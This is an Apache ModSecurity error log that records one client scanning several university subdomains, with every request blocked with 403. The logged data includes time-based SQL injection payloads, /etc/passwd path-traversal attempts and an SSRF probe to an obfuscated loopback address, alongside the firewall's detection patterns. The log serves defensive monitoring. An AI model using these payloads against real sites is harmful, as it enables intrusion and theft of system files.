[Tue Aug 29 11:35:10.336780 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAUOaVYAAABG"]
[Tue Aug 29 11:35:10.341128 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAVJXlUAAAAA"]
[Tue Aug 29 11:35:10.346177 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAATxvZUAAAAw"]
[Tue Aug 29 11:35:10.347403 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAATPtTgAAAAM"]
[Tue Aug 29 11:35:10.350904 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAUJIzgAAABB"]
[Tue Aug 29 11:35:10.352284 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAPLwKwAAAAX"]
[Tue Aug 29 11:35:10.354239 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAUKhBQAAABC"]
[Tue Aug 29 11:35:10.354728 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAATlLGAAAAAq"]
[Tue Aug 29 11:35:10.355429 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAATQXi4AAAAO"]
[Tue Aug 29 11:35:10.355858 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAUDQUYAAAA7"]
[Tue Aug 29 11:35:10.356729 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAATzVJ4AAAAx"]
[Tue Aug 29 11:35:10.358368 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAATWYSwAAAAa"]
[Tue Aug 29 11:35:10.360614 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAATfd4wAAAAk"]
[Tue Aug 29 11:35:10.363239 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAUGZBEAAAA@"]
[Tue Aug 29 11:35:10.363966 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAUUZ9UAAABK"]
[Tue Aug 29 11:35:10.364584 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fsCo-f0AAASOUqsAAAAR"]
[Tue Aug 29 11:35:11.303862 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11f8Co-f0AAAUUZ9YAAABK"]
[Tue Aug 29 11:35:11.309990 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11f8Co-f0AAAUXLkgAAABM"]
[Tue Aug 29 11:35:11.358728 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11f8Co-f0AAATzVKAAAAAx"]
[Tue Aug 29 11:35:12.321183 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAATUxSoAAAAW"]
[Tue Aug 29 11:35:12.323983 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAATWYS8AAAAa"]
[Tue Aug 29 11:35:12.331374 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVWP-8AAAAV"]
[Tue Aug 29 11:35:12.332176 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAATOA-IAAAAH"]
[Tue Aug 29 11:35:12.334508 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVJXlcAAAAA"]
[Tue Aug 29 11:35:12.340472 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAT2JSEAAAAz"]
[Tue Aug 29 11:35:12.362521 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATOA-MAAAAH"]
[Tue Aug 29 11:35:12.376115 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAARdiUIAAAAK"]
[Tue Aug 29 11:35:12.398708 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAATavwIAAAAg"]
[Tue Aug 29 11:35:12.479791 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATWYTEAAAAa"]
[Tue Aug 29 11:35:12.493698 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAUZcHAAAABO"]
[Tue Aug 29 11:35:12.670816 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAUZcHAAAABO"]
[Tue Aug 29 11:35:12.723689 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATWYTEAAAAa"]
[Tue Aug 29 11:35:12.777317 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAPLwLIAAAAX"]
[Tue Aug 29 11:35:13.312674 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gcCo-f0AAATPtTwAAAAM"]
[Tue Aug 29 11:35:13.319772 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAVRxdsAAAAQ"]
